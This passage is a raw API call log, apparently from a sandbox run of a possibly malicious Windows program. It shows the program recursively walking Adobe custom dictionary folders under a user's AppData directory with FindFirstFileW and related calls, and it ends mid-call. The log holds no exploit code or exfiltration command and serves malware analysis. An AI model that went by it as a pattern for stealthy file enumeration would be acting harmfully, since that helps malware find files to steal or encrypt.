ftLastAccessTime.dwLowDateTime=0xe9487bb0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9487bb0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0173.255] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36263c8 | out: hHeap=0xcd0000) returned 1 [0173.255] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9487bb0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9487bb0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9487bb0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.255] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9487bb0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9487bb0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9487bb0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0173.255] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0173.256] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b57de0 | out: hHeap=0xcd0000) returned 1 [0173.256] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3626938 | out: hHeap=0xcd0000) returned 1 [0173.256] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0173.256] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0173.256] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn\\") returned="frn\\" [0173.256] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0173.256] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0173.256] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0173.256] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0173.256] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0173.257] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0173.257] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.257] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.257] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0173.257] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.257] PathFindFileNameW (pszPath="") returned="" [0173.257] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\frn\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9d9af90, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9d9af90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9d9af90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0173.258] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36263c8 | out: hHeap=0xcd0000) returned 1 [0173.258] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9d9af90, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9d9af90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9d9af90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.258] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9d9af90, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9d9af90, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9d9af90, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0173.258] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0173.258] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b57de0 | out: hHeap=0xcd0000) returned 1 [0173.258] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3626938 | out: hHeap=0xcd0000) returned 1 [0173.258] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0173.258] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0173.258] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm\\") returned="grm\\" [0173.258] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0173.259] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0173.259] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0173.259] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0173.259] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0173.259] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0173.259] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.259] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.259] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0173.259] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.259] PathFindFileNameW (pszPath="") returned="" [0173.259] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\grm\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9924650, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9924650, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9924650, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0173.260] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36263c8 | out: hHeap=0xcd0000) returned 1 [0173.260] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9924650, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9924650, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9924650, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.260] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe9924650, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xe9924650, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xe9924650, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0173.260] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0173.260] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b57de0 | out: hHeap=0xcd0000) returned 1 [0173.260] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3626938 | out: hHeap=0xcd0000) returned 1 [0173.260] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0173.260] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0173.260] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl\\") returned="itl\\" [0173.260] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0173.261] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0173.261] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0173.261] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0173.261] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0173.261] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0173.261] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.261] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.261] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0173.261] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.261] PathFindFileNameW (pszPath="") returned="" [0173.261] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\itl\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea6d44d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea6d44d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea6d44d0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0173.262] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36263c8 | out: hHeap=0xcd0000) returned 1 [0173.262] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea6d44d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea6d44d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea6d44d0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.262] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea6d44d0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea6d44d0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea6d44d0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0173.262] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0173.262] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b57de0 | out: hHeap=0xcd0000) returned 1 [0173.262] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3626938 | out: hHeap=0xcd0000) returned 1 [0173.262] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0173.262] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0173.262] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw\\") returned="nrw\\" [0173.262] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0173.263] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0173.263] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0173.263] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0173.263] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0173.263] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0173.263] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.263] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.263] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0173.263] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.263] PathFindFileNameW (pszPath="") returned="" [0173.263] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\nrw\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb90f4b0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb90f4b0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb90f4b0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0173.264] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36263c8 | out: hHeap=0xcd0000) returned 1 [0173.264] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb90f4b0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb90f4b0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb90f4b0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.264] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xeb90f4b0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xeb90f4b0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xeb90f4b0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0173.264] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0173.264] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b57de0 | out: hHeap=0xcd0000) returned 1 [0173.264] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3626938 | out: hHeap=0xcd0000) returned 1 [0173.264] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0173.264] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0173.264] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt\\") returned="prt\\" [0173.264] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0173.264] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0173.265] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0173.265] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0173.265] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0173.265] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0173.265] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.265] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.265] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0173.265] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.265] PathFindFileNameW (pszPath="") returned="" [0173.265] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\prt\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec2489f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec2489f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec2489f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0173.266] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36263c8 | out: hHeap=0xcd0000) returned 1 [0173.266] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec2489f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec2489f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec2489f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.266] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xec2489f0, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xec2489f0, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xec2489f0, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0173.266] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0173.266] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b57de0 | out: hHeap=0xcd0000) returned 1 [0173.266] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3626938 | out: hHeap=0xcd0000) returned 1 [0173.266] PeekMessageW (in: lpMsg=0x401ff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401ff08) returned 0 [0173.266] PeekMessageW (in: lpMsg=0x401fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x401fb74) returned 0 [0173.266] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn\\") returned="spn\\" [0173.266] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\") returned="Adobe Custom Dictionary\\" [0173.266] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\") returned="Dictionaries\\" [0173.267] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\") returned="Linguistics\\" [0173.267] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\") returned="Adobe\\" [0173.267] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0173.267] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0173.267] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0173.267] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0173.267] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x3b3c6d8 | out: hHeap=0xcd0000) returned 1 [0173.267] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0173.267] PathFindFileNameW (pszPath="") returned="" [0173.267] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Adobe\\Linguistics\\Dictionaries\\Adobe Custom Dictionary\\spn\\*", lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea237a30, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea237a30, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea237a30, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x362b660 [0173.267] HeapFree (in: hHeap=0xcd0000, dwFlags=0x0, lpMem=0x36263c8 | out: hHeap=0xcd0000) returned 1 [0173.267] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea237a30, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea237a30, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea237a30, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0173.268] FindNextFileW (in: hFindFile=0x362b660, lpFindFileData=0x401fba4 | out: lpFindFileData=0x401fba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xea237a30, ftCreationTime.dwHighDateTime=0x1d2ddf4, ftLastAccessTime.dwLowDateTime=0xea237a30, ftLastAccessTime.dwHighDateTime=0x1d2ddf4, ftLastWriteTime.dwLowDateTime=0xea237a30, ftLastWriteTime.dwHighDateTime=0x1d2ddf4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 0 [0173.268] FindClose (in: hFindFile=0x362b660 | out: hFindFile=0x362b660) returned 1 [0173.268] HeapFree (in: 